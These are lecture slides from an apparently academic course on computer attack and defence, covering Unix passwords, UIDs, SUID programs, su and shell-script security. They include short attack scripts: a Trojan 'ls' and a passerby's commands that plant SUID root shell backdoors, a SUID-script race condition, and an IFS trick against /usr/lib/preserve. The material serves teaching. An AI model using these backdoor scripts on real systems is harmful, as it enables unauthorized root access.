電腦攻擊與防禦
The Attack and Defense of Computers
Dr. 許
富 皓
Passwords in Unix/Linux Systems
/etc/passwd
Format:
Racehl: eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:bin/ksh
home directory
account name
uid gid user name
encrpyted password
login shell
System Function Account
Unix opens special accounts for a variety of system
functions. (e.g. daemon/sys, ftp, nobody, uucp)
Daemon:*:1:1: :/tmp:
ftp:*:3:3:FTP User:/usr/sool/ftp:
Nobody:*:60001:60001::/tmp:
uucp:*:4:4::/usr/spool/uucppublic:/us/lib/uucp/uucico
Prevent users from using login to log into the system.
(not include trusted host/user; rlogin)
Password Crackers
Download (1)
Download (2)
John the Ripper password cracker -- Linux
Ophcrack 2 -- Windows
One Time Password
Password list
Small Card
Calculator
UID, GID, and SUID
Account Name and UID
UID 0  root.
A system identifies a user by her/his UID, not
her/his name.
e.g. Name: root, UID: 100  no root privilege
Name: doggy, UID: 0  root privilege.
good habit: user name root should be
preserved for system administrators.
Users with different user names but with the
same UID are treated as the same user by
the system.
Real UIDs and Effective UIDs
A Unix process has at least these two IDs:
Real UID: a process owner’s real identity and matches
up with the username the owner logged in as.
Effective UID: a system decide a process’s privilege
based on this ID.
Usually, the above two IDs of a process are the
same.
setuid or SUID program
When a suid program is run, the process involved
takes on an efficient UID that is the same as the
owner of the file, but the real UID remains the same
as the one of the user that creates the process.
chmod 4xxx filename
e.g.
$ chmod 4757 program_name
$ ls –al
..
-rwsr-xrwx root user 16384
suid program indicator
Sep 3 2005 program_name
setuid Program examples
su
passwd
Group
Each user belongs to a primary group that is stored in the
/etc/passwd file.
The /etc/group file contains every group and its gid
in a system.
vision:*:101:Keith,arlin,janice
users:*:100:
startrek:*:102:janice,karen,arlin
Each user can belong to several different groups, but
her/his gid can be the gid of only one of the groups
which she/he belongs to.
A user can use command newgrp to change her/his gid.
Case 1 : need a password
Case 2 : don’t need a password
su: Substitute User
%whoami
tim
%su john
Password: *******
%whomai
john
========================================
%su
Password:********
# whoami
root
#
new prompt
super user password
Security Problem with su
Typte
/bin/su
1) avoid Trojan horse
(another program with the
same name and in one of
the directories listed in
the PATH variable.)
2) The access right of
the directory that contains
the Trojan may not be set
correctly.
cause the sub-shell to read all relevant
startup files and simulate a login;
therefore, the new shell uses the root’s
environment variable, including PATH.
Stealing Superuser Account
Assume: the root’s PATH variable is as follows: .:xxxxxxx
Observation: When going into a directory, the first command a user types
usually is ls.
A Trojan
horse shell
%cat ls
script with
#! /bin/sh
name ls.
cp /bin/sh ./stuff/junk/.superdude
chmod 4555 ./stuff/junk/.superdude
rm –f $0
exec /bin/ls ${1+”$@”}
====================================
1) Change the access right of the user’s home directory
%cd
so that the victim must use root account to see the
content of this directory.
%chmod 700 .
2) Create a file named -f
%touch ./-f
Account Steal by Passersby
$ cp /bin/sh /tmp/break-acct
$ chmod 4755 /tmp/break-acct
When a user left her/his terminal unnoticed, then a
bystander could create a backdoor easily by just
typing the above commands.
Shells and Shell Scripts
Shell
Also called a command line interpreter.
When you login a system, it displays a prompt on
the screen and waits for you to enter a commend.
A running shell is also a process.
Some of the famous shells
Bourne shell (/bin/sh)
Bourne Again shell (/bin/bash)
Korn Shell (/bin/ksh)
C-shell (/bin/csh)
Shell Script
A shell script is series of commands written in
plain text file.
In order to make a shell script executable, its file
permission must be changed to executable.
Usually the first line of a shell script is as follows:
#! Shell
, then followed by a series of commands
Security Problems of SUID Shell Script
Two shells are involved in the execution of a shell
script.
The shell that accepts the shell script command.
The shell that executes the shell script.
Race Conditon.
$
$
$
$
cd /tmp
ln /etc/setid_script temp
nice -20 temp &
mv my_script temp
Between the time the kernel
opens the file to see which
interpreter to run, and when
the (now-set-id) interpreter
turns around and reopens the
file to interpret it, an attacker
might change the file
(directly or via symbolic
links).
Solution
/dev/fd
When the kernel passes the name of the set-id
script to open to the interpreter, rather than
using a pathname (which would permit the
race condition) it instead passes the filename
/dev/fd/3.
IFS Security
IFS Environment Variable
The IFS specifies which characters separate
commands. It is normally set to a space,
tab, or new line.
IFS and Shell Script Security
By changing the IFS, a hacker can change
what programs our script executes.
Our script calls the /usr/bin/passwd
program.
Changing the IFS to "/" with
% export IFS='/'
causes the script to no longer run
/usr/bin/passwd, but instead run usr
bin passwd. Now a hacker can create a
script called usr that generates a root shell.
Security Hole in
/usr/lib/preserve
vi
preserve
recover
3. preserve save the file
in a restricted area
1.telnet
2. disconnect
4. recover program
read from the area
/usr/lib/preserve and
/bin/mail
preserve was installed SUID root.
preserve ran /bin/mail as the root
user to alert users that their files had been
preserved.
preserve executed the mail program
with the system() function call.
According to the content of IFS to parse a
string into command, options, and arguments
Change IFS to Execute a Different
Program/Script
If IFS=‘/’, then preserve will execute,
bin mail instead of /bin/mail.
% cat bin
#! /bin/sh
cd /home/mydir/bin
cp /bn/sh ./sh
chown root sh
chmod 4755 sh